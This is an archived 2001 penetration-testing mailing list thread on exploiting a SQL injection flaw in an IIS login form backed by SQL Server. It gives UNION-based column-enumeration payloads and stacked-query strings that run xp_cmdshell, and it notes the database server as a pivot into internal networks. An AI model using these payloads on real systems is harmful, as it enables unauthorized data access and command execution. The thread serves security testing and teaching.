Penetration Testing mailing list archives

RE: SQL

From: "rudi carell" <rudicarell () hotmail com>
Date: Thu, 22 Nov 2001 07:55:35


Andrew said:

Don't you need the returned recordset to be written to the html stream in
order to see anything useful?  For instance if you are just looking at a
login page you may not get any joy with appending extra SELECTs?  We have
just been playing with exactly this!

Andrew Miller



.. yes,

but .. the first thing is .. there is no need for html-output when you canexecute system-commands (xp_cmdshell..,sp_adduser etc ....)


and

htmloutput can be achieved by

a) using aliases (AS)
b) brute-force the column(s) you can see within output using "UNION"

HowTo:

1)guess the number of columns from table A by Column-Padding (see example)
2)find the right column number within Query (see example)
3)if necessary typecast columns

example:

---cut here---
sequence I

[original] union select '1' from sysusers;--
[original] union select '1','1' from sysusers;--
[original] union select '1','1','1' from sysusers;--
[original] union select '1','1','1','1'from sysusers;--

after no error message
sequence II

[original] union select name,'1','1','1' from sysusers;--
[original] union select '1',name,'1','1' from sysusers;--
[original] union select '1','1',name,'1','1' from sysusers;--

.. until name appears within html .... tataa
---cut here---


nice day,


rc


security () freefly com
http://www.freefly.com/security/

You migh (90% chance) have a possibility to

a) alter the database
b) execute remote commands in the SQL server

This is a common error (not quoting quotes :), this is due to the SQL
statement being executed in the ISS server (through an ODBC connection)
is just added the information given by the user.

Thus:

SELECT * from test where value='$user'

if user=' becomes:

SELECT * from test where value='''

which generates your error.

However, you can do the following
if user=test'; select * from test -- becomes:

SELECT * from test where value='test'; select * from test -- '

which is a valid SQL statement (two as a matter of fact) and
if user=test'; exec master..xp_cmdshell 'dir' -- becomes:

SELECT * from test where value='test'; exec master..xp_cmdshell 'dir' --


which will run the 'dir' command in the SQL server (not in the IIS!)
This is fun
since, in some cases, the ISS server is in a DMZ and the SQL server is
in the internal
lan or through another firewall like this:

Internet ----- Fw -------- Fw --------- Local network
                    |           |
               IIS         SQL server

or

Internet ----- Fw -------- Local network
                    |                |
               IIS          SQL server


So you might be one step closer to your target !

Some references (fresh out from google):
http://www.sqlsecurity.com/faq-inj.asp
http://www.silksoft.co.za/data/sqlinjectionattack.htm

        Regards


        Javier Fernández-Sanguino Peña

>
> Hello all,
>
>
> I am doing a pen test against a IIS 5 web server. The web
> server requires a
> user name and password via a logon form. if a single quote
> character is
> entered (username)the following error is produced
>
> [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
> before the character string '' and password=''.
>
> I remember reading somewhere that this can be used to gain
> further access?
> but i cant find the info.
>
> Can any one help?
>
> Thanks in advance.
>
> Gary
>
>
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus Security
> Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security
> vulnerabilities please see:
> https://alerts.securityfocus.com/
>

----------------------------------------------------------------------------

This list is provided by the SecurityFocus Security Intelligence Alert(SIA)

Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


_____________________________________________________________________
This message has been checked for all known viruses by bluesource. For
further information visit www.blue-source.com

powered by Messagelabs


------------Insight Consulting Limited--------------------------------

Insight Consulting Limited is a leading specialist provider of independentservices in all aspects of information and communications security,business continuity and risk management from consultancy, implementation,testing and training to recruitment, research and outsourcing.

---------------------Disclaimer----------------------------------------

Internet communications are not secure and therefore Insight ConsultingLimited does not accept legal responsibility for the contents of thismessage. Any views or opinions presented are solely those of the authorand do not necessarily represent those of Insight Consulting Limited unlessotherwise specifically stated. If this message is received by anyone otherthan the addressee, please notify the sender and then delete the messageand any attachments from your computer.

-----------------------------------------------------------------------

----------------------------------------------------------------------------

This list is provided by the SecurityFocus Security Intelligence Alert(SIA)

Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

Re: SQL, (continued)
- Re: SQL Kevin Spett (Nov 20)
- Re: SQL root (Nov 20)
- Re: SQL neil-at-geekshanty-dot-com (Nov 20)
- Re: SQL Sverre H. Huseby (Nov 20)
- RE: SQL Holmes, Ben (Nov 20)
- RE: SQL Javier Fernández-Sanguino (Nov 20)
- RE: SQL Paul Midian (Nov 20)
- Re: SQL David . French (Nov 20)
- RE: SQL Andy Miller (Nov 21)
- Re: SQL Andrea secondote? (Nov 22)
- RE: SQL rudi carell (Nov 22)
- RE: SQL Javier Fernández-Sanguino (Nov 23)